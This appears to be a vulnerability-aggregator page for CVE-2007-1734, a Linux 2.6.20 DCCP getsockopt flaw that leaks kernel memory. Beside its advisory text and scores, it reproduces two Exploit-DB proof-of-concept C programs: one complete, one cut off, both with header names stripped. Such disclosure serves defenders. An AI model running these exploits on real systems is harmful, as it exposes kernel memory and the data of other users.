CVE-2007-1734
published 2007-03-28CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value…
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.73%
49.6th percentile
The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat6.6MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-92h4-4w9c-9q5w: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
ghsa_unreviewed·2022-05-01·CVSS 6.6
CVE-2007-1734 [MEDIUM] GHSA-92h4-4w9c-9q5w: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.
Red Hat
CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
vendor_redhat·CVSS 6.6
CVE-2007-1734 [MEDIUM] CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.
Statement: Not vulnerable. This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
exploitdb·2007-03-28
CVE-2007-1734 Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
---
#include
#include
#include
#include
#include
#include
#include
#define BUFSIZE 0x10000000
int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) {
printf("Alloc failed\n");
return -1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len);
if (x == -1)
perror("SETSOCKOPT");
else
printf("SUCCESS\n");
write(1, mem, BUFSIZE);
return 0;
}
// milw0rm.com [2007-03-28]
Exploit-DB
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
exploitdb·2007-03-27
CVE-2007-1734 Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
---
/*
Linux Kernel DCCP Memory Disclosure Vulnerability
Synopsis:
The Linux kernel is susceptible to a locally exploitable flaw
which may allow local users to steal data from the kernel memory.
Vulnerable Systems:
Linux Kernel Versions: >= 2.6.20 with DCCP support enabled.
Kernel versions
#include
#include
#include
#include
#include
#include
#define BUFSIZE 0x10000000
int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (!mem) {
printf("Cannot allocate mem\n");
return 1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
int len = -1;
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV
No writeups or analysis indexed.
http://securityreason.com/securityalert/2511http://www.securityfocus.com/archive/1/463969/100/0/threadedhttp://www.securitytracker.com/id?1017820https://exchange.xforce.ibmcloud.com/vulnerabilities/33274https://exchange.xforce.ibmcloud.com/vulnerabilities/43321http://securityreason.com/securityalert/2511http://www.securityfocus.com/archive/1/463969/100/0/threadedhttp://www.securitytracker.com/id?1017820https://exchange.xforce.ibmcloud.com/vulnerabilities/33274https://exchange.xforce.ibmcloud.com/vulnerabilities/43321
2007-03-28
Published